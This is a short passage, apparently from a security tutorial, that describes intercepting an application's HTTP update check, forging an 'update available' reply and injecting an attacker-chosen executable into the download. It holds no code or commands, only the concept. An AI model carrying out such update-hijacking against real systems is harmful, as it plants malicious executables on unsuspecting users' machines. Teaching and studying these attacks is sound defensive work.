We saw how we could manipulate packets to replace a downloaded executable with our own naughty payload. Now, we'll look at a nifty variation on this idea: intercepting the HTTP traffic initiated by an application as part of an update check; forging a reply that says yes, your maker has an update for you, tell the user to download it; and then injecting an executable of our choice into the requested download back to the application.
The update check we're looking at is familiar to most users: when you start up a certain program and, after a few seconds, a window automatically pops up to let you know an update is available. Behind the scenes, the application phones home to do a quick check. It's not much different from the previous injection attack, except this time the application is initiating...